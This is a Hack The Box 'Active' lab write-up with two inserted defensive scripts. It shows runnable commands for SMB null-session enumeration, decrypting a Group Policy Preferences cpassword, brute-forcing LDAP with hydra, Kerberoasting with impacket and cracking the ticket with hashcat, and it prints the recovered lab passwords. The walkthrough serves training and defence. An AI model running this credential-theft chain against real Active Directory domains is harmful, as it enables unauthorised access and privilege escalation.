HTB Active
Author: collinhacks (@collinhacks)
Enumeration
nmap
(all ports, full service enumeration)
nmap -p- -sV -A <ip> --open -o full-enumerate.nmap
└─$ nmap -p- -sV -A $IP --open -o full-enumerate.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-02 23:23 EDT
Nmap scan report for 10.129.144.13
Host is up (0.036s latency).
Not shown: 53714 closed tcp ports (conn-refused), 11799 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-03 03:24:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49173/tcp open msrpc Microsoft Windows RPC
49174/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-08-03T03:25:20
|_ start_date: 2023-08-03T03:14:12
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.78 seconds
nmap
(all identified TCP ports + default scripts & service versions)
nmap -p <1,2,3> -sV --script default --script http-methods --script http-headers <ip> -o <ip>-identified-ports.nmap
┌──(collinhacks㉿CH)-[~/Lab/HTB/Active]
└─$ nmap -p 53,88,135,139,389,445,464,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49173,49174 -sV --script default --script http-methods --script http-headers $IP -o identified-ports.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-02 23:27 EDT
Nmap scan report for 10.129.144.13
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-03 03:27:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-headers:
| Content-Type: text/html; charset=us-ascii
| Server: Microsoft-HTTPAPI/2.0
| Date: Thu, 03 Aug 2023 03:28:46 GMT
| Connection: close
| Content-Length: 315
|
|_ (Request type: GET)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49173/tcp open msrpc Microsoft Windows RPC
49174/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-08-03T03:28:47
|_ start_date: 2023-08-03T03:14:12
|_clock-skew: -1s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.13 seconds
nmap
(vuln scan)
nmap -p <1,2,3> --script vuln <ip> -o <ip>-vuln.nmap
Nothing reported.
Port Enumeration
Port 389
base DN:
DC=active,DC=htb
nmap -n -sV --script "ldap* and not brute" $IP
└─$ nmap -n -sV --script "ldap* and not brute" $IP
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-02 23:40 EDT
Nmap scan report for 10.129.144.13
Host is up (0.042s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-03 03:40:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| currentTime: 20230803034111.0Z
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb
| namingContexts: DC=active,DC=htb
| namingContexts: CN=Configuration,DC=active,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
| namingContexts: DC=DomainDnsZones,DC=active,DC=htb
| namingContexts: DC=ForestDnsZones,DC=active,DC=htb
| defaultNamingContext: DC=active,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb
| configurationNamingContext: CN=Configuration,DC=active,DC=htb
| rootDomainNamingContext: DC=active,DC=htb
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| highestCommittedUSN: 110658
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| dnsHostName: DC.active.htb
| ldapServiceName: active.htb:dc$@ACTIVE.HTB
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| isSynchronized: TRUE
| isGlobalCatalogReady: TRUE
| domainFunctionality: 4
| forestFunctionality: 4
|_ domainControllerFunctionality: 4
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
| ldap-rootdse: [identical to the 389/tcp ldap-rootdse output above, repeated verbatim by nmap]
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Windows 2008 R2; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.06 seconds
ldapsearch -H ldap://10.129.144.13 -x
This gets us something, but not much: the anonymous bind itself is accepted, but the DC refuses a subtree search until a successful bind has been completed.
# extended LDIF
#
# LDAPv3
# base <> (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1
ldapsearch -H ldap://active.htb:389/ -x -s base -b '' "(objectClass=*)" "*" +
A base-scope read of the rootDSE does work anonymously, and gives us the same information as the nmap ldap-rootdse output above:
└─$ ldapsearch -H ldap://active.htb:389/ -x -s base -b '' "(objectClass=*)" "*" +
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: * +
#

#
dn:
currentTime: 20230803041722.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb
defaultNamingContext: DC=active,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb
configurationNamingContext: CN=Configuration,DC=active,DC=htb
rootDomainNamingContext: DC=active,DC=htb
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 110659
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: DC.active.htb
ldapServiceName: active.htb:dc$@ACTIVE.HTB
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 4
forestFunctionality: 4
domainControllerFunctionality: 4

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
Attempted hydra but got nothing (I thought that since LDAPv3 was supported, something could be done with it):
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.129.144.13 ldap3 -f -u -I
Not really getting anywhere with this. Let’s take a new route. ⭐
Enumerate SMB
How many SMB shares can we find?
smbmap -H 10.129.144.13
└─$ smbmap -H 10.129.144.13
[+] IP: 10.129.144.13:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
OK, so 7 shares in total, and "Replication" is READ ONLY even for this unauthenticated (null-session) query, so we can probably access it without credentials.
smbclient to read the READ ONLY share
smbclient //active.htb/Replication
Just hit Enter at the password prompt: the share allows a null session, so the empty password gets us in.
Now that we have a session, we can look around for a file that can help us.
Found this directory: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
It contains a file called Groups.xml; download it with:
get Groups.xml
Looking at the file locally we have:
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Username: active.htb\SVC_TGS
Encrypted password: cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
We are looking at a GPP (Group Policy Preferences) password here. The cpassword value is AES-encrypted with a key that Microsoft published in its own documentation, so anyone who can read SYSVOL can recover the plaintext; MS14-025 stopped Windows from writing new cpassword values, but existing ones remain in SYSVOL until the preference item is removed.
We decrypt it with gpp-decrypt:
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
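The defender-side counterpart to the Groups.xml finding, added here and not part of the original writeup: an audit that walks a SYSVOL copy and reports every Group Policy Preferences file still carrying a non-empty cpassword attribute, generalised from Groups.xml to the other preference types that can store one. The directory layout, account names and cpassword value in the sample are constructed placeholders.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files that can carry a cpassword attribute (the MS14-025 set).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}


def find_cpasswords(xml_text, path="<inline>"):
    """Return (path, element_tag, account) for each <Properties> with a non-empty cpassword."""
    root = ET.fromstring(xml_text)
    findings = []
    # ElementTree has no parent links, so visit every element and inspect its
    # direct <Properties> child; that is where GPP keeps the attribute.
    for elem in root.iter():
        for props in elem.findall("Properties"):
            if not props.get("cpassword"):
                continue  # attribute absent or empty: no stored credential
            account = (props.get("userName") or props.get("accountName")
                       or props.get("runAs") or "")
            findings.append((path, elem.tag, account))
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL-style tree and audit every known GPP file found in it."""
    results = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8") as fh:
                    results.extend(find_cpasswords(fh.read(), full))
    return results


# Constructed sample with the same shape as the Groups.xml above; the
# cpassword value and the account names are placeholders, not real data.
SAMPLE_GROUPS_XML = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User name="example.local\\svc_demo"><Properties action="U" '
    'cpassword="CONSTRUCTED_BASE64_BLOB" userName="example.local\\svc_demo"/></User>'
    '<User name="example.local\\clean"><Properties action="U" cpassword="" '
    'userName="example.local\\clean"/></User>'
    '</Groups>'
)


def demo():
    """Write the sample into a temporary SYSVOL layout and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpp_dir = os.path.join(tmp, "Policies",
                               "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                               "MACHINE", "Preferences", "Groups")
        os.makedirs(gpp_dir)
        with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_sysvol(tmp)


if __name__ == "__main__":
    for path, tag, account in demo():
        print(f"{path}: <{tag}> stores a cpassword for {account!r}")
```

Run it against a copy of \\<dc>\SYSVOL and remove or re-create every flagged preference item, then rotate the affected account's password, since the stored value has to be treated as already exposed.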
Exploitation
Port 139 & 445
Foothold
smbmap with credentials
smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H active.htb
└─$ smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H active.htb
[+] IP: active.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
With these credentials we can now read three more shares (NETLOGON, SYSVOL and Users), so we connect to them the same way we did to Replication, this time passing the username:
smbclient //active.htb/<share> -U SVC_TGS
It then prompts for the password.
The login succeeds, which confirms the SVC_TGS credentials are valid.
Root
Kerberoasting
We can Kerberoast here because we hold valid domain credentials, even though they are only a low-privileged user's: any authenticated domain user can request a service ticket for an account that has an SPN.
- First we use GetUserSPNs from impacket to list the service principal names that are tied to normal user accounts:
/opt/impacket/examples/GetUserSPNs.py -dc-ip 10.129.144.13 active.htb/SVC_TGS -outputfile GetUserSPNs.out
- It is important to specify -outputfile GetUserSPNs.out because if a ticket is returned it is written to that file, and we can then crack it offline.
└─$ /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.129.144.13 active.htb/SVC_TGS -outputfile GetUserSPNs.out
Impacket v0.10.1.dev1+20230728.114623.fb147c3f - Copyright 2022 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-08-02 23:15:19.048952
[-] CCache file is not found. Skipping...
┌──(collinhacks㉿CH)-[~/Lab/HTB/Active]
└─$ ls
cpassword.txt full-enumerate.nmap GetUserSPNs.out GptTmpl.inf Groups.xml hash.txt hydra.restore identified-ports.nmap users.txt user.txt vuln.nmap windapsearch
┌──(collinhacks㉿CH)-[~/Lab/HTB/Active]
└─$ cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$fbabe10baa66adcb376bdbb6a72b16a7$[...]
It looks like we got a ticket for the Administrator account.
hashcat time (mode 13100 is Kerberos 5 TGS-REP etype 23, which matches the $krb5tgs$23$ prefix):
hashcat -m 13100 GetUserSPNs.out /usr/share/wordlists/rockyou.txt
Cracked: Ticketmaster1968
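As an added detection-side example (not from the original writeup), the logic a defender would run over Security event 4769 records to spot the request pattern above: Kerberoasting tooling asks for RC4 (etype 0x17) service tickets, which is exactly what the $krb5tgs$23$ prefix reflects, so successful RC4 TGS requests for user-owned SPNs, and especially several from one account in a short window, are the signal. The field names and the sample events are constructed for the demo.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # etype 23: what Kerberoasting tools request ($krb5tgs$23$)

# Constructed sample of Security event 4769 fields: TargetUserName (who asked),
# ServiceName (which SPN account), TicketEncryptionType and Status.
EVENTS = [
    {"time": "2023-08-03T03:40:10", "user": "svc_demo@EXAMPLE.LOCAL", "service": "sqlsvc",    "etype": "0x17", "status": "0x0"},
    {"time": "2023-08-03T03:40:12", "user": "svc_demo@EXAMPLE.LOCAL", "service": "websvc",    "etype": "0x17", "status": "0x0"},
    {"time": "2023-08-03T03:40:15", "user": "svc_demo@EXAMPLE.LOCAL", "service": "backupsvc", "etype": "0x17", "status": "0x0"},
    {"time": "2023-08-03T03:41:00", "user": "alice@EXAMPLE.LOCAL",    "service": "sqlsvc",    "etype": "0x17", "status": "0x0"},
    {"time": "2023-08-03T03:41:30", "user": "WS01$@EXAMPLE.LOCAL",    "service": "DC$",       "etype": "0x12", "status": "0x0"},
    {"time": "2023-08-03T03:42:00", "user": "bob@EXAMPLE.LOCAL",      "service": "krbtgt",    "etype": "0x12", "status": "0x0"},
    {"time": "2023-08-03T03:42:05", "user": "bob@EXAMPLE.LOCAL",      "service": "sqlsvc",    "etype": "0x12", "status": "0x0"},
    {"time": "2023-08-03T03:42:10", "user": "mallory@EXAMPLE.LOCAL",  "service": "websvc",    "etype": "0x17", "status": "0x1b"},
]


def suspicious_requests(events):
    """Successful RC4 service-ticket requests whose target SPN belongs to a user account."""
    out = []
    for e in events:
        svc = e["service"]
        if e["status"] != "0x0":
            continue  # no ticket was issued, so there is nothing to crack
        if e["etype"].lower() != RC4_HMAC:
            continue  # AES tickets are not the cheap offline-cracking target
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine accounts and the TGT service have random keys
        out.append(e)
    return out


def kerberoast_alerts(events, window=timedelta(minutes=5), min_distinct=3):
    """Users that obtained RC4 tickets for >= min_distinct different SPNs inside one window."""
    by_user = defaultdict(list)
    for e in suspicious_requests(events):
        by_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        # slide a window anchored on each request and count distinct services in it
        for i, (t0, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(services) >= min_distinct:
                alerts[user] = sorted(services)
                break
    return alerts


if __name__ == "__main__":
    for user, spns in kerberoast_alerts(EVENTS).items():
        print(f"ALERT {user} requested RC4 tickets for {len(spns)} SPNs: {', '.join(spns)}")
```

A single RC4 request for one SPN (alice in the sample) is only flagged by suspicious_requests, not alerted on, because legitimate RC4-only clients exist; the lasting fix is long random passwords or gMSAs for SPN accounts and AES-only settings so that etype 23 tickets are not issued at all.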
Authenticate as root
Now we can authenticate with smbclient:
smbclient //active.htb/Users -U Administrator
Password: Ticketmaster1968
Lessons Learned
- Using SMB to enumerate even though LDAP was being fired in my face from nmap
- Kerberoasting